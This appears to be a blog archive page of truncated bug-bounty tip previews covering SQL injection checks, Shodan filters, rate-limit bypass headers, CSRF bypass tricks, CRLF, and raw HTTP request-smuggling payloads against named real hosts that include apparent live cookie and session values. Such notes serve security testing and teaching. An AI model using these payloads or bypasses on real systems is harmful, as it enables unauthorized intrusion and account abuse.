Month: February 2023

How to find SQL injection vulnerability?1) Logical OperationOne of the best ways to confirm a SQL injection is by making it operate a logical operation and having the expected results. For example: if theGET parameter ?username=Slacker returns the same content as ?username=Slacker’ or ?username=Slacker+’1’=’1 then, you found a SQLinjection.2) Time Based SQL InjectionMost relative place…

» city » country nginx city:”San Diego” country:US » geo Devices within a 50km radius of San Diego (32.8,-117): geo:32.8,-117,50 » hostname “Server: gws” hostname:google » net net:216.219.0.0/16 » os microsoft-iis os:”windows 2003″ » before/ after apache country:CH after:22/03/2010 before:4/6/2010 » port proftpd port:21 21 (FTP) 22 (SSH) 23 (Telnet) 25 (SMTP) 53 (DNS) 80…

imageimagehttps://huzaifa-tahir.medium.com/methods-to-bypass-rate-limit-5185e6c67ecd2.Rate Limit Bypass Headers:Most Application’s use X-Forwarded-For common method for identifying the originating IP address of the client. We All know that using XForwarded-For: IP Header Can sometime’s Bypass Ratelimit Protection. Sometimes Adding Two Times X-Forwarded-For: IP Header Instead of Onetime Can Bypass Ratelimit ProtectionX-Forwarded: 127.0.0.1X-Forwarded-By: 127.0.0.1X-Forwarded-For: 127.0.0.1X-Forwarded-For-Original: 127.0.0.1X-Forwarded-For-Ip: 127.0.0.1X-Forwarded-Host: 127.0.0.1X-Forward-For: 127.0.0.1Forwarded: 127.0.0.1Forwarded-For: 127.0.0.1Forwarded-For-Ip: 127.0.0.1X-Originating-IP:…

TPOST /login HTTP/1.1Host: staging-login.newrelic.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/70.0.3508.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8Accept-Encoding: gzip, deflateCookie: optimizelyEndUserId=oeu1547215128308r0.023321653201122228; ajs_user_id=null; ajs_group_id=null; ajs_anonymous_id=%22a5f7b9bb-8c8a-4add-ac69-75200d4c46cb%22;Content-Type: application/x-www-form-urlencodedContent-Length: 189Transfer-Encoding: chunkedTransfer-Encoding: foo
3ereturn_to=https%3A%2F%2Fstaging-insights-embed.newrelic.com%2F0
GET / HTTP/1.1Host: staging-login.newrelic.com:123X-Forwarded-Host: skeletonscribe.netContent-Length: 10
x= DELETE / HTTP/1.1Transfer-Encoding: chunkedHost: api.zomato.comContent-Length: 91User-Agent: Treasure/6.7
0
GET https://YOUR_COLLAB_URL/desync/ HTTP/1.1X: X Safari/537.36TSNGUID=6093d809-7d9d-4d52-bfb9-335de9fb69b8; _ga=GA1.2.1374597116.1547216490; _gid=GA1.2.1093027572.1547216490; _gcl_au=1.1.1026642629.1547216493; _mkto_trk=id:412-MZS-894&token:_mch-newrelic.com-1547216493639-15775; __qca=P0-235566894-1547221374728; intercom-id-cyym0u3i=bd3a0989-6e9f-4e6d-a497-9a41ef6d5290; _fbp=fb.1.1547249472663.621468648; ei_client_id=5c39274682f6eb000fa6d52a; _golden_gate_session=bkRPMUZ3STBrY0laZG0zemY1Umg5cFVhcWpNaGpvZWN2T0tOM3hWL2p2UVdaVTJLZFh5NkJtQnZHV2FIR3hnZWpKaWFvM2F2WkRab3hjWTd5b3A1T2dOY20zWWNQaFhZNWVRZXFuRkFwU3l1YVZMdm1JSW9pSGd0UnRicnRBUVdhaGg3UXJQTFJ0c3ZkMHRyaHZqNjYreCt4dWUwVlp1UTdrSVFpSEx6akVITjRWWGNrSUR5NGdIdG80UnFJS2xpVTNlU1BpK0hjWEZJMVF1R2I4RlNNeUdicVdTWFVDQnBlQ0NQSXdNYXFJM2lDTWc5VldLOTJ3N1A3Wll5RytpZVNya2J1WTdTNUZ5UVFRNk5KVmt2TmNudlU3WDFQMVJPbGtkWXJJWXd1YjA9LS1MeU1EbTkrZ29qVVo2VkNUMDhnMVp3PT0%3D–155cef8a5f5d2bcb69b1d1952af040a3479aeacb; _gat=1GET…

1- Change single char 2- Sending empty value of token 3- Replace with same length 4- Clickjacking 5- Changing POST/GET method 6- RemoveCSRF parameter from request 7- Use another users’s valid token 8- CSRF protection by Referer header? Remove the header [ADD in form ] 9-Bypass using subdomain [victim.com.attacker.com] 10- Try to decrypt hash(maybe CSRF…

CRLFThe term CRLF refers to Carriage Return (ASCII 13, \r) Line Feed (ASCII 10, \n). They’re used to note the termination of a line,however, dealt with differently in today’s popular Operating Systems. For example: in Windows both a CR and LF are required to notethe end of a line, whereas in Linux/UNIX a LF is…